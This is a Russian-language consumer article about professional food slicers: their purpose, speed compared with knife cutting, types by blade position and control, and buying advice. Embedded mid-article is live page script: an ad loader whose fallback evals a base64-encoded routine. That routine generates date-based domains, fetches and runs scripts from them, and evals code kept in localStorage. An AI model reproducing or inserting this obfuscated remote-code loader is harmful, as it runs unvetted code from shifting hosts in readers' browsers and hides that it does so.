Что такое слайсер и его назначение: виды и выбор

Самый простой способ нарезки продуктов питания — с помощью ножа. Он эффективен в домашних условиях, когда не предъявляется строгих требований к качеству и объемы не такие большие, как в заведениях общественного питания. Специально для ресторанов, кафе, супермаркетов и фабрик по производству мясных деликатесов и твердых сыров выпускаются профессиональные устройства под названием «слайсеры». Они представляют собой машины для аккуратного, точного и быстрого нарезания продуктов питания. Если возникает необходимость покупки такой техники, то к этому вопросу следует отнестись со всей ответственностью и изучить предлагаемые разновидности.

Зачем нужны слайсеры

Слайсеры еще называют «ломтерезками», которые были разработаны специально для применения в сфере общественного питания, где всегда имеются большие объемы продукции. С помощью таких аппаратов происходит аккуратное разделение продуктов на ломтики. В итоге получаются не только ровные и красивые, но и одинаковые по толщине кусочки. Причем конструкцией слайсеров предусматривается возможность выставления толщины сервировки, которая составляет от 1 до 16 мм.

Скорость нарезки продуктов зависит от производительности техники. Если планируете купить слайсер https://system4.ua/ru/category/slayseryi, то следует знать, что он справляется с нарезкой в 2–3 раза быстрее (примерно 3–5 минут). Повару же потребуется не менее 10 минут, чтобы нарезать колбасу ножом. При этом качество нарезки будет также значительно отличаться. Еще слайсеры не требуют прикладывания физических усилий, исключая вероятность возникновения усталости у человека. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Разновидности оборудования

Производители предлагают слайсеры разных моделей, которые отличаются не только мощностью и производительностью, но и функциями. Профессиональное оборудование классифицируется на виды по следующим критериям:

Тип расположения режущего диска. Они бывают вертикального и гравитационного типа. Второй характеризуется таким преимуществом, как самостоятельная подача продукта за счет действия сил гравитации.Способ управления. Они бывают ручные (когда пользователь не только подает измельчаемый продукт, но и самостоятельно вращает режущий элемент), а также полуавтоматические и автоматические. Преимущество первого типа заключается лишь в сниженной стоимости, но наиболее популярными видами являются автоматические и полуавтоматические устройства.По предназначению. Слайсеры предназначены для обработки разных продуктов: сыров, колбас, деликатесов, рыбы, хлеба. Для каждого типа продуктов применяются соответствующие варианты устройств.

Важным элементом оборудования является нож, который приводится в движение электроприводом. При выборе рекомендуется отдавать предпочтение моделям, которые оснащены функцией самозаточки ножа. Это исключит необходимость частого обслуживания устройств, на что также потребуются не только финансовые расходы, но и затраты времени. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/chto-takoe-slajser-i-ego-naznachenie-vidy-i-vybor/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top